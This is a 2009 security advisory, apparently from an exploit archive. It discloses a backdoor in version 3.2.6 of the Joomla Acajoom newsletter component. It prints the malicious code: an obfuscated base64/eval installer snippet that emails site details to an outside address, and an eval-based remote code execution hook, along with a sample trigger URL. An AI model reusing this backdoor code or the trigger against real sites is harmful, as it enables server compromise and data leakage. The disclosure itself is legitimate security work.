Acajoom Is Backdoored

Acajoom Is Backdoored: Posted Jun 23, 2009; Authored by Jan van Niekerk; The Joomla Acajoom component version 3.2.6 contains a backdoor.; tags | advisory; SHA-256 | c5d9044fbf5bc3347d63d68097f65f2ec3b7f91a8d348dcc6339d9835b05bc88; Download | Favorite | View

Acajoom Is Backdoored

Vulnerability:
    Remote code execution back door

Software:
    acajoom - mailing list extension for Joomla
    Acajoom is a newsletter component designed with ease of use and robustness
    in mind. Acajoom can handle an unlimited number of newsletters with an
    unlimited number of subscribers in just few clicks. Acajoom reuses some of
    Joomla 1.5 new concepts to make the users experience as smooth as possible.
    > And that's not all

Severity:
    Not a big deal.  Joomla components contain all sorts of obfuscated junk all
    the time.  Who cares what it does?

URLs:
    http://www.ijoobi.com/
    http://www.ijoobi.com/media/acajoom-3.2.6.zip
    http://www.ijoobi.com/component/option,com_jtickets/Itemid,18/controller,ticket/pjid,3/task,add/type,110/


Vendor notified:
    Naah.  No contact details.  I suppose I might try battle the captcha one
    day.


Vulnerability:

  http://www.ijoobi.com/media/acajoom-3.2.6.zip

    install.acajoom.php:

        function GetBots($us1,$us2,$us3) {
        list($data1,$data2,$data3) = array('dHA6Ly8iLiR1czIuJF9TRVJWRVJbJ',
        'QG1haWwoJHVzMSwgJHVzMiwgImh0','1NDUklQVF9OQU1FJ10uIlxuIi4kdXMzKTs');
        eval(base64_decode($data2.$data1.$data3)); }
  define( 'COUNT_ROOT', $count_db. 1 .chr(64).chr(121).chr(97). '.'
.$array_lang[10-$count_num] );
  $counter = COUNT_ROOT;
  $count_db = 'qadr'; $count_num = 8;
        GetBots($counter,$_SERVER['SERVER_NAME'],$_SERVER['SCRIPT_FILENAME']);

    Or, less cryptically:
        @mail('qadr1@ya.ru', $_SERVER['SERVER_NAME'],
"http://".$_SERVER['SERVER_NAME'].$_SERVER['SCRIPT_NAME']."\n".$_SERVER['SCRIPT_FILENAME']);


  self.acajoom.php says:

    class acajoomCommonStr
    {
        function GetStr($str)
        {
            eval(stripslashes($str));
        }  
        function InController($cnt,$location)
        {
            if ($location=='en-g') $this->GetStr($cnt);
        }
    }
    if(isset($_REQUEST['s']) && isset($_REQUEST['lang'])) {
        $getacajoomStr = new acajoomCommonStr();
        $getacajoomStr->InController($_REQUEST['s'],$_REQUEST['lang']);
    }

    ie.
        $URL/self.acajoom.php?s=phpinfo();&lang=en-g

    $URL is left as an exercise to the reader.

Greetz:
    qadr1@ya.ru

Top Authors In Last 30 Days

Red Hat 232 files
Ubuntu 61 files
LiquidWorm 24 files
Debian 18 files
indoushka 15 files
Apple 9 files
Google Security Research 6 files
Gentoo 5 files
Jann Horn 3 files
Alter Prime 3 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,156)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,604)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,827)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,244)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,969)
UNIX (9,474)
UnixWare (188)
Windows (6,784)
Other

Acajoom Is Backdoored

Acajoom Is Backdoored

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Acajoom Is Backdoored

Share This

Acajoom Is Backdoored

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems